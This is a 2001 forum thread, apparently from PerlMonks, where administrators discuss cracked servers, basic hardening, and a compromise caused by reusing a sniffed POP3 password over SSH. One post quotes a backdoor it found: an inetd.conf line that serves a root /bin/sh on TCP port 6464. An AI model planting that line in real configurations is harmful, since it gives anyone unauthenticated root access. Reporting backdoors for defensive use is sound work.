Re: ACKKKKKKKKK! I Have been cracked!

Ive been the person called in to repair dozens of cracked servers. Alot of times, when a box gets cracked its pure laziness.

You should always keep an ear out for security patches. You should always block IPs based on hosts.allow and deny. You should always have MySQLs access tables defined, and not world accessable. Dont allow anyone who isnt trusted telnet/ssh access to your box ( once your in, your good as root ).

Doing this prevents the script kiddies from getting in your box, But this will not prevent a REAL cracker from accessing your box.

On a side note, I recently was called in to help fix a box and found the following backdoor installed.

in inetd.conf:

6464 stream tcp nowait root /bin/sh sh -i

So simple It was beautiful... a perfect back door that few people would catch.

-pete

Comment on Re: ACKKKKKKKKK! I Have been cracked!

Replies are listed 'Best First'.
Re^2: ACKKKKKKKKK! I Have been cracked! by tadman (Prior) on Apr 03, 2001 at 18:18 UTC
As an aside that is hopefully not too OT, one of the boxes here was cracked once. It was all because of a simple (human) error. POP3/FTP passwords are sent plaintext, and so the system was configured to have different passwords for POP3/FTP from the system accounts. Unfortunately, due to laziness, I suppose, one of the admins set their password to be the same for both and later logged in from home to check their mail. A few days later, our box was cracked with an off-the-shelf "root kit". Even though we were using SSH, they were able to "sniff" the POP3 password over their cable modem and then log in using SSH, use SUDO, and have their way with our system. Thankfully the 'haX0r' only ran some sort of IRC bot or relay program and didn't do any real damage. Always make sure that your POP3 and FTP passwords are not the same as your SSH login! Especially for users with 'sudo' access!	[reply]
Re: Re^2: ACKKKKKKKKK! I Have been cracked! by isotope (Deacon) on Apr 03, 2001 at 20:50 UTC
Actually, I'd recommend having completely separate accounts for sudo (only used off-site in emergencies, otherwise on-site only), with RSA authentication only. Keep the email on a separate, private, non-privileged account. --isotope http://www.skylab.org/~isotope/	[reply]